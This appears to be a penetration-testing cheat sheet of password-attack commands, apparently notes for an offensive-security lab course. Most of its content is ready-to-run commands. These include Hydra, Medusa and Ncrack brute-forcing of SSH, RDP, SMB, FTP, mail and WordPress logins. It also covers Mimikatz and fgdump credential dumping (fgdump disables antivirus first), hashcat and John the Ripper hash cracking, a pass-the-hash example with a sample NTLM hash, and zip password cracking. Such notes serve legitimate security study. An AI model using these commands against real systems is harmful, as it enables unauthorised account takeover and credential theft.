Password Attacks

• AES Decryption http://aesencryption.net/

• Convert multiple webpages into a word list

  for x in 'index' 'about' 'post' 'contact' ; do \
    curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >> webapp.txt ; \
  done

• Or convert html to word list dict html2dic index.html.out | sort -u > index-html.dict

• Default Usernames and Passwords

  • CIRT http://www.cirt.net/passwords

  • Government Security - Default Logins and Passwords for Networked Devices

  • http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php

  • Virus.org http://www.virus.org/default-password/

  • Default Password http://www.defaultpassword.com/

• Brute Force

  • Nmap Brute forcing Scripts https://nmap.org/nsedoc/categories/brute.html

  • Nmap Generic auto detect brute force attack: nmap --script brute -Pn <target.com or ip>

  • MySQL nmap brute force attack: nmap --script=mysql-brute $ip

• Dictionary Files

  • Word lists on Kali cd /usr/share/wordlists

• Key-space Brute Force

  • crunch 6 6 0123456789ABCDEF -o crunch1.txt

  • crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

  • crunch 8 8 -t ,@@^^%%%

• Pwdump and Fgdump - Security Accounts Manager (SAM)

  • pwdump.exe - attempts to extract password hashes

  • fgdump.exe - attempts to kill local antiviruses before attempting to dump the password hashes and cached credentials.

• Windows Credential Editor (WCE)

  • allows one to perform several attacks to obtain clear text passwords and hashes. Usage: wce -w

• Mimikatz

  • extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets https://github.com/gentilkiwi/mimikatz From metasploit meterpreter (must have System level access):

    meterpreter> load mimikatz
    meterpreter> help mimikatz
    meterpreter> msv
    meterpreter> kerberos
    meterpreter> mimikatz_command -f samdump::hashes
    meterpreter> mimikatz_command -f sekurlsa::searchPasswords

• Password Profiling

  • cewl can generate a password list from a web page cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt

• Password Mutating

  • John the ripper can mutate password lists nano /etc/john/john.conf john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt

• Medusa

  • Medusa, initiated against an htaccess protected web directory medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10

• Ncrack

  • ncrack (from the makers of nmap) can brute force RDP ncrack -vv --user offsec -P password-file.txt rdp://$ip

• Hydra

  • Hydra brute force against SNMP

    hydra -P password-file.txt -v $ip snmp

  • Hydra FTP known user and rockyou password list

    hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp

  • Hydra SSH using list of users and passwords

    hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh

  • Hydra SSH using a known password and a username list

    hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh

  • Hydra SSH Against Known username on port 22

    hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt

  • Hydra POP3 Brute Force

    hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V

  • Hydra SMTP Brute Force

    hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

  • Hydra attack http get 401 login with a dictionary

    hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin

  • Hydra attack Windows Remote Desktop with rockyou

    hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

  • Hydra brute force SMB user with rockyou:

    hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

  • Hydra brute force a Wordpress admin login

    hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Password Hash Attacks

• Online Password Cracking https://crackstation.net/ http://finder.insidepro.com/

• Hashcat Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.

  apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev

  and

  apt-get install pocl-opencl-icd

Cracking Linux Hashes - /etc/shadow file

500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Cracking Windows Hashes

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Cracking Common Application Hashes

  900 | MD4                                              | Raw Hash
    0 | MD5                                              | Raw Hash
  5100 | Half MD5                                         | Raw Hash
  100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
  1400 | SHA-256                                          | Raw Hash
  1700 | SHA-512                                          | Raw Hash

Create a .hash file with all the hashes you want to crack puthasheshere.hash: $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/

Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:

hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt

Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/

Wordpress clear text: test

Hashcat example cracking Wordpress passwords using rockyou:

`hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`

• Sample Hashes http://openwall.info/wiki/john/sample-hashes

• Identify Hashes

  hash-identifier

• To crack linux hashes you must first unshadow them:

  unshadow passwd-file.txt shadow-file.txt

  unshadow passwd-file.txt shadow-file.txt > unshadowed.txt

• John the Ripper - Password Hash Cracking

  • john $ip.pwdump

  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes

  • john --rules --wordlist=/usr/share/wordlists/rockyou.txt

  • john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

  • JTR forced descrypt cracking with wordlist

    john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt

  • JTR forced descrypt brute force cracking

    john --format=descrypt hash --show

• Passing the Hash in Windows

  • Use Metasploit to exploit one of the SMB servers in the labs. Dump the password hashes and attempt a pass-the-hash attack against another system:

    export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

    pth-winexe -U administrator //$ip cmd

Cracking zip file password

fcrackzip -v -b -D -p rockyou.txt -u ./backup.zip